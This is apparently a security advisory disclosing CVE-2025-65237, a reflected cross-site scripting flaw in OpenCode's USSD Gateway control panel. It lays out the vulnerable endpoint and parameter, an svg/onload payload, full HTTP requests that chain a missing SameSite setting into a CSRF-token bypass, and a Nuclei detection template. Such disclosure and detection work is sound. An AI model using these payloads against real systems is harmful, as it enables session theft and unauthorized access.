[CVE-2025-65237] USSD Gateway Reflected Cross-Site Scripting
Technical information about the CVE-2025-65237 in OpenCode USSD GW application.
Description
Reflected Cross-Site Scripting in the USSD Gateway application offered by OpenCode Systems allows the user who has an access to the vulnerable function to execute JavaScript code against the victim.
Application Details
Name: USSD Gateway
Vendor: OpenCode Systems
Version: OC Release 5 - Version 6.13.11
Technical Details
Vulnerable Endpoint:
/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_aVulnerable Parameter:
flt_sessidPayload Sample:
flt_sessid=6"><svg/onload=alert("poc%20XSS")>
Exploitation
This vulnerability is a chain of 2 vulnerabilities to convert self XSS to reflected XSS. The server assign cookies to the user after being logged in without specifying the SameSite value to Lax allowing the attacker to convert the request from GET to POST to bypass the CSRF verification parameter in the POST body.
The original request shows the vulnerable parameter in the POST body and contains CSRF verification parameter as well.
POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a HTTP/2
Host: REDACTED
Cookie: openid-state=c2b8133[...]lVtEIc%22%3B%7D; OCPANEL-SESSIONID=1hjg[...]fv6o; _csrf=a15d2cf80[...]yIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
[...]
_csrf=t_OoX[...]3D%3D&display=1&flt_sessid=6&flt_user=&flt_server_node=[...]HTTP/2 200 OK
[...]
Content-Length: 22712
Content-Type: text/html; charset=utf-8
[...]
<TD align=right class=txt_small7 width=100><B>Session ID</B>: </td>
<td class=txt_small7><input type=text name=flt_sessid class="txt frmtxt" value="6" size=10></td>
</tr>
<tr>
<TD align=right class=txt_small7 width=100><B>User ID</B>: </td>
[...]An attempt was made to remove the CSRF verification parameter's value or delete the whole parameter because it's now self XSS and can't be shared with different users, but the server rejected the request as shown below
POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a HTTP/2
Host: REDACTED
Cookie: openid-state=c2b8133[...]lVtEIc%22%3B%7D; OCPANEL-SESSIONID=1hjg[...]fv6o; _csrf=a15d2cf80[...]yIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
[...]
_csrf=&display=1&flt_sessid=6&flt_user=&flt_server_node=[...]HTTP/2 400 Bad Request
Content-Length: 18611
Content-Type: text/html; charset=utf-8
[...]
[...]
<div class="alert alert-danger" role="alert">
<h4>Error 400</h4>
<hr>
<h4 class="alert-heading">
Unable to verify your data submission.
</h4>
<p class="mb-0 error-description">
Unfortunately we're having trouble loading the page you are looking for. Please use the actions below.
</p>
</div>
[...]It was noticed that the server is assigning the cookies to the user without adding Lax value for the SameSite parameter. This allows us to convert the request from POST to GET and remove the CSRF verification parameter to make a vulnerable URL can be shared with different users.
For more information about the SameSite types and bypasses, browse the following labs https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions
By Changing the request from POST to GET and remove the verification parameter's value for the CSRF or even the whole parameter and send it again, the server accepted the request and the vulnerable parameter's value is being reflected in the response.
GET /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a&_csrf=&display=1&flt_sessid=6"><svg/onload=alert("poc%20XSS")>&flt_user=&flt_server_node=[...] HTTP/2
Host: REDACTED
Cookie: openid-state=c2b8133[...]lVtEIc%22%3B%7D; OCPANEL-SESSIONID=1hjg[...]fv6o; _csrf=a15d2cf80[...]yIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
[...]HTTP/2 200 OK
Content-Length: 22749
Content-Type: text/html; charset=utf-8
[...]
[...]
<td class=txt_small7><input type=text name=flt_sessid class="txt frmtxt" value="6"><svg/onload=alert(document.cookie)>" size=10></td>
[...]Nuclei Template
You can use this template for an easy detection.
id: ocpanel-ussdgw-xss
info:
name: USSD Gateway OCP Control Panel Reflected XSS
author: Eslam Ali Akl @eslam3kl
severity: Medium
description: |
Reflected XSS test for the OCP Control Panel USSD Gateway session listing.
Injects a simple XSS payload into the flt_sessid parameter and flags
the target if the payload is reflected unescaped in the HTML response.
tags: [xss, reflected, ocpanel, ussdgw]
requests:
- id: reflected_xss
method: GET
path:
- "{{BaseURL}}/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a&_csrf=&display=1&flt_sessid=6%22%3E%3Csvg/onload=alert(document.cookie)%3E&flt_user=&flt_server_node="
headers:
User-Agent: "nuclei-scan"
Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
Cookie: "{{cookie}}"
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "<svg/onload=alert\\("
- type: word
words:
- "alert(document.cookie)"
Last updated